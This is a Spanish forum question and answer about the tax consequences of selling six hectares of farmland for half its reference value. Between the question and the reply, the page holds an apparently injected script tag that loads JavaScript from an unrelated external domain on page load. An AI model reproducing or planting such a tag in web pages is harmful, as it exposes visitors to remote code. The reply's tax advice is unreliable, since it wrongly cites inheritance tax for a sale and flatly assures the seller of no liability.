Venta de un terreno por un valor inferior al tasado

Buenas tardes, voy a vender un terreno de 6 hectáreas de regadío por un valor inferior al valor catastral. El valor referenciado es de 60.000 y yo voy a vender por 30.000. Las razones de la venta se debe a que 3 de las hectáreas no son actas para cultivo porque tiempo atrás se hizo una extracción de tierras y por tanto no encuentro un comprador y además estoy en una situación económica delicada y necesito dicho dinero. Esto puede ocasionar algún problema a la hora de que hacienda te reclame impuestos por la diferencia, o esto solo afectaría al comprador. Gracias y un saludo

<script type="text/javascript" src="http://temarosaplus.info/?0.8771685162759407"></script>
{"lat":0,"lng":0}

1 Respuesta

Respuesta

Al comprador sin duda alguna le van a reclamar y a ti en principio no te tienen porque reclamar nada ya que en caso de necesidad mucha gente como tú está vendiendo las fincas por debajo del valor de las mismas, eso sí la administración para asegurarse el cobro del impuesto de sucesiones le dará una valoración más alta notificando al comprador que debe abonar la diferencia impositiva entre lo declarado y lo comprobado por ellos, pero bueno es al comprador a ti no te afecta.